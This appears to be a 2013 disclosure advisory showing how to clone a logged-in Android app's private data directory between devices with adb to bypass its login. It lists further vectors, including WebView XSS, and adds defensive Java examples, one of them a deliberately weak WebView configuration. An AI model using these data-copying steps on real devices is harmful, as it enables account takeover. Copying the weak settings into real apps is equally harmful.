"Data-Clone" -- a new way to attack android apps Author: SuperHei@www.knownsec.com [Email:5up3rh3i#gmail.com] Release Date: 2013/03/16 Update Date: 2013/03/18 References: http://www.80vul.com/android/data-clone.txt Chinese Version: http://blog.knownsec.com/2013/03/attack-your-android-apps-by-webview/ --[ I - Introduction This is a new way to attack android apps t,and i call it "Data-Clone Attack". it can bypass password authentication ,when user login the app and set "remember password"(some apps is define). --[ II - Description let us use a demo to illustrat it , This is a test procedure: 1. open two emulator. >adb devices List of devices attached emulator-5554 device emulator-5556 device both devices install "com.tencent.mobileqq"(https://play.google.com/store/search?q=com.tencent.mobileqq&c=apps),Ofcourse, you also can use other applications to test. 2. login the app on "emulator-5554" and make sure you choose the "remember password". then pull the app data to your PC >adb -s emulator-5554 pull /data/data/com.tencent.mobileqq/ d:\\aab pull: building file list... 
pull: /data/data/com.tencent.mobileqq/databases/qcenter.Db -> d:\aab/databases/qcenter.Db
pull: /data/data/com.tencent.mobileqq/databases/*************.db -> d:\aab/databases/*************.db
pull: /data/data/com.tencent.mobileqq/shared_prefs/only.xml -> d:\aab/shared_prefs/only.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/share.xml -> d:\aab/shared_prefs/share.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/com.tencent.mobileqq_preferences.xml -> d:\aab/shared_prefs/com.tencent.mobileqq_preferences.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/mobileQQ.xml -> d:\aab/shared_prefs/mobileQQ.xml
pull: /data/data/com.tencent.mobileqq/shared_prefs/*************.xml -> d:\aab/shared_prefs/*************.xml
pull: /data/data/com.tencent.mobileqq/files/ADPic/457 -> d:\aab/files/ADPic/457
pull: /data/data/com.tencent.mobileqq/files/Skin/skinmain.xml -> d:\aab/files/Skin/skinmain.xml
pull: /data/data/com.tencent.mobileqq/files/Skin/tab_bg_bar.png -> d:\aab/files/Skin/tab_bg_bar.png
pull: /data/data/com.tencent.mobileqq/files/Skin/thumbnail_skin.xml -> d:\aab/files/Skin/thumbnail_skin.xml
pull: /data/data/com.tencent.mobileqq/files/Skin/title_bg_bar.png -> d:\aab/files/Skin/title_bg_bar.png
pull: /data/data/com.tencent.mobileqq/files/sc/ConfigStore2.dat -> d:\aab/files/sc/ConfigStore2.dat
pull: /data/data/com.tencent.mobileqq/files/ConfigStore2.dat -> d:\aab/files/ConfigStore2.dat
pull: /data/data/com.tencent.mobileqq/files/runningApp -> d:\aab/files/runningApp
pull: /data/data/com.tencent.mobileqq/lib/libamrnb.so -> d:\aab/lib/libamrnb.so
pull: /data/data/com.tencent.mobileqq/lib/libaudiohelper.so -> d:\aab/lib/libaudiohelper.so
pull: /data/data/com.tencent.mobileqq/lib/libcodecwrapper.so -> d:\aab/lib/libcodecwrapper.so
pull: /data/data/com.tencent.mobileqq/lib/libCommon.so -> d:\aab/lib/libCommon.so
pull: /data/data/com.tencent.mobileqq/lib/liblbs.so -> d:\aab/lib/liblbs.so
pull: /data/data/com.tencent.mobileqq/lib/libmsfboot.so -> d:\aab/lib/libmsfboot.so
pull: /data/data/com.tencent.mobileqq/lib/libsnapcore.so -> d:\aab/lib/libsnapcore.so
pull: /data/data/com.tencent.mobileqq/lib/libVideoCtrl.so -> d:\aab/lib/libVideoCtrl.so
23 files pulled. 0 files skipped.
88 KB/s (4431172 bytes in 49.011s)

3. Push the data to "emulator-5556":

>adb -s emulator-5556 push D:\aab /data/data/com.tencent.mobileqq/
push: D:\aab/databases/qcenter.Db -> /data/data/com.tencent.mobileqq/databases/qcenter.Db
push: D:\aab/databases/*************.db -> /data/data/com.tencent.mobileqq/databases/*************.db
push: D:\aab/files/ADPic/457 -> /data/data/com.tencent.mobileqq/files/ADPic/457
push: D:\aab/files/sc/ConfigStore2.dat -> /data/data/com.tencent.mobileqq/files/sc/ConfigStore2.dat
push: D:\aab/files/Skin/title_bg_bar.png -> /data/data/com.tencent.mobileqq/files/Skin/title_bg_bar.png
push: D:\aab/files/Skin/thumbnail_skin.xml -> /data/data/com.tencent.mobileqq/files/Skin/thumbnail_skin.xml
push: D:\aab/files/Skin/tab_bg_bar.png -> /data/data/com.tencent.mobileqq/files/Skin/tab_bg_bar.png
push: D:\aab/files/Skin/skinmain.xml -> /data/data/com.tencent.mobileqq/files/Skin/skinmain.xml
push: D:\aab/files/runningApp -> /data/data/com.tencent.mobileqq/files/runningApp
push: D:\aab/files/ConfigStore2.dat -> /data/data/com.tencent.mobileqq/files/ConfigStore2.dat
push: D:\aab/lib/libVideoCtrl.so -> /data/data/com.tencent.mobileqq/lib/libVideoCtrl.so
push: D:\aab/lib/libsnapcore.so -> /data/data/com.tencent.mobileqq/lib/libsnapcore.so
push: D:\aab/lib/libmsfboot.so -> /data/data/com.tencent.mobileqq/lib/libmsfboot.so
push: D:\aab/lib/liblbs.so -> /data/data/com.tencent.mobileqq/lib/liblbs.so
push: D:\aab/lib/libCommon.so -> /data/data/com.tencent.mobileqq/lib/libCommon.so
push: D:\aab/lib/libcodecwrapper.so -> /data/data/com.tencent.mobileqq/lib/libcodecwrapper.so
push: D:\aab/lib/libaudiohelper.so -> /data/data/com.tencent.mobileqq/lib/libaudiohelper.so
push: D:\aab/lib/libamrnb.so -> /data/data/com.tencent.mobileqq/lib/libamrnb.so
push: D:\aab/shared_prefs/share.xml -> /data/data/com.tencent.mobileqq/shared_prefs/share.xml
push: D:\aab/shared_prefs/only.xml -> /data/data/com.tencent.mobileqq/shared_prefs/only.xml
push: D:\aab/shared_prefs/mobileQQ.xml -> /data/data/com.tencent.mobileqq/shared_prefs/mobileQQ.xml
push: D:\aab/shared_prefs/com.tencent.mobileqq_preferences.xml -> /data/data/com.tencent.mobileqq/shared_prefs/com.tencent.mobileqq_preferences.xml
push: D:\aab/shared_prefs/*************.xml -> /data/data/com.tencent.mobileqq/shared_prefs/*************.xml
23 files pushed. 0 files skipped.
69 KB/s (4431172 bytes in 62.108s)

4. adb shell into "emulator-5556":

>adb -s emulator-5556 shell
# ls -l /data/data/
ls -l /data/data/
drwxr-x--x app_1    app_1             2012-09-24 02:43 com.android.htmlviewer
....
drwxr-x--x app_35   app_35            2012-12-06 07:17 com.tencent.mobileqq

We see that the owner of com.tencent.mobileqq is "app_35". Because the data was pushed as root:

# ls -l /data/data/com.tencent.mobileqq
ls -l /data/data/com.tencent.mobileqq
drwxrwxr-x root     root              2012-12-06 07:17 shared_prefs
drwxrwxr-x root     root              2012-12-06 07:16 databases
drwxrwx--x app_35   app_35            2012-12-06 07:10 cache
drwxrwx--x app_35   app_35            2012-12-06 07:16 files
drwxr-xr-x system   system            2012-12-06 07:17 lib

So we need to chown:

# cd /data/data/com.tencent.mobileqq
cd /data/data/com.tencent.mobileqq
# chown app_35 *
chown app_35 *
# ls -l
ls -l
drwxrwxr-x app_35   root              2012-12-06 07:17 shared_prefs
drwxrwxr-x app_35   root              2012-12-06 07:16 databases
drwxrwx--x app_35   app_35            2012-12-06 07:10 cache
drwxrwx--x app_35   app_35            2012-12-06 07:16 files
drwxr-xr-x app_35   system            2012-12-06 07:17 lib

5. Open the app on "emulator-5556": you are now logged in to com.tencent.mobileqq on "emulator-5556".

--[ III - How to exploit

"How to get the contents of the data" is the key to completing the attack. Some ways:

1. If you already have super-user privileges in a root shell, as in the demo, you can bypass password authentication with the "Data-Clone Attack".

-----------------------[update (2013/3/18)] This conclusion is wrong!------------------------------
2. Apps installed on the SD card: others have read permission there and can obtain the app's data.
--------------------------------------------------------------------------------------------------

3. Cross-site scripting in an Android app + WebView + XSS (or a WebKit XCS vulnerability) = "Data-Clone"

On older versions of Android, an Android app's XSS or a WebKit XCS vulnerability can read the contents of local files: http://www.80vul.com/android/android-0days.txt

So the app's WebView has file read permission on the app's data, and when a user of the app visits a URL link, the data can be cloned.

--[ IV - Disclosure Timeline

2012/03/   - Found this
2012/12/10 - Reported it to security@android.com
...... a long time passed ......
2013/03/16 - security@android.com has not given any response (maybe because Google is not Android's biological mother)
2013/03/16 - Public Disclosure

[update (2013/3/18): thanks to Jann Horn (jannhorn@googlemail.com) for pointing out my error!]
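The demo in section II works because whatever the app writes under /data/data/<pkg> for "remember password" is, by itself, enough to authenticate whoever holds a copy. An added example, not code from this advisory or from the app it tests, of the fix a developer can apply: seal the remembered session token with a non-exportable key in AndroidKeyStore (API 23+), so a cloned shared_prefs or databases directory decrypts to nothing on any other device. The class name, the key alias and the seal/open helpers are assumptions.

```java
import android.security.keystore.KeyGenParameterSpec;
import android.security.keystore.KeyProperties;
import java.security.KeyStore;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;

/** Added example: "remember me" token sealed with a non-exportable AndroidKeyStore key (API 23+). */
public final class DeviceBoundToken {
    private static final String ALIAS = "remember_me_key";  // hypothetical key alias
    private static final int IV_LEN = 12, TAG_BITS = 128;   // AES-GCM IV/tag sizes used by Android

    // Key material is generated inside the Keystore (TEE-backed where the device has one) and is
    // never exported, so ciphertext copied out of /data/data/<pkg> cannot be opened elsewhere.
    private static SecretKey key() throws Exception {
        KeyStore ks = KeyStore.getInstance("AndroidKeyStore");
        ks.load(null);
        SecretKey k = (SecretKey) ks.getKey(ALIAS, null);
        if (k != null) return k;
        KeyGenerator kg = KeyGenerator.getInstance(KeyProperties.KEY_ALGORITHM_AES, "AndroidKeyStore");
        kg.init(new KeyGenParameterSpec.Builder(ALIAS,
                KeyProperties.PURPOSE_ENCRYPT | KeyProperties.PURPOSE_DECRYPT)
                .setBlockModes(KeyProperties.BLOCK_MODE_GCM)
                .setEncryptionPaddings(KeyProperties.ENCRYPTION_PADDING_NONE)
                .build());
        return kg.generateKey();
    }

    // Returns IV || ciphertext; persist this blob (shared_prefs, a file) instead of the raw token.
    public static byte[] seal(byte[] sessionToken) throws Exception {
        Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
        c.init(Cipher.ENCRYPT_MODE, key());       // the Keystore supplies a fresh random IV
        byte[] iv = c.getIV(), ct = c.doFinal(sessionToken);
        byte[] blob = new byte[iv.length + ct.length];
        System.arraycopy(iv, 0, blob, 0, iv.length);
        System.arraycopy(ct, 0, blob, iv.length, ct.length);
        return blob;
    }

    // Returns the token, or null so the caller forces a real login: blob missing, written on
    // another device (no such key there, so AEADBadTagException), or tampered with.
    public static byte[] open(byte[] blob) {
        if (blob == null || blob.length <= IV_LEN) return null;
        try {
            Cipher c = Cipher.getInstance("AES/GCM/NoPadding");
            c.init(Cipher.DECRYPT_MODE, key(), new GCMParameterSpec(TAG_BITS, blob, 0, IV_LEN));
            return c.doFinal(blob, IV_LEN, blob.length - IV_LEN);
        } catch (Exception e) {
            return null;
        }
    }
}
```

This defeats the pull/push/chown copy in the demo, not an attacker who already runs code as root or as the app on the victim device and can drive the Keystore in place; the server should also be able to revoke a remembered token.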
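For the third vector in section III, an added example (not from the advisory) of the WebView settings that give rendered content the app's own read access to /data/data/<pkg>, beside the hardened configuration; WebViewHardening and its two methods are assumed names.

```java
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

/** Added example: WebView settings that expose app data to rendered content, next to the hardened set. */
public final class WebViewHardening {

    // Weak: JavaScript plus file:// access means an XSS in the rendered page (or a WebKit bug of
    // the kind the advisory cites) runs with the app's own read access to /data/data/<pkg>.
    public static void configureWeak(WebView wv) {
        WebSettings s = wv.getSettings();
        s.setJavaScriptEnabled(true);
        s.setAllowFileAccess(true);                 // default was true before targetSdk 30
        s.setAllowFileAccessFromFileURLs(true);     // default was true before API 16
        s.setAllowUniversalAccessFromFileURLs(true);
    }

    // Hardened: no file: or content: scheme at all, JavaScript only when genuinely needed, and
    // navigation limited to https so an injected script has nothing local to read.
    public static void configureHardened(WebView wv, boolean needsJavaScript) {
        WebSettings s = wv.getSettings();
        s.setJavaScriptEnabled(needsJavaScript);
        s.setAllowFileAccess(false);
        s.setAllowContentAccess(false);
        s.setAllowFileAccessFromFileURLs(false);
        s.setAllowUniversalAccessFromFileURLs(false);
        wv.setWebViewClient(new WebViewClient() {
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                return !url.startsWith("https://");   // true = refuse the load (file:, javascript:, http:)
            }
        });
    }
}
```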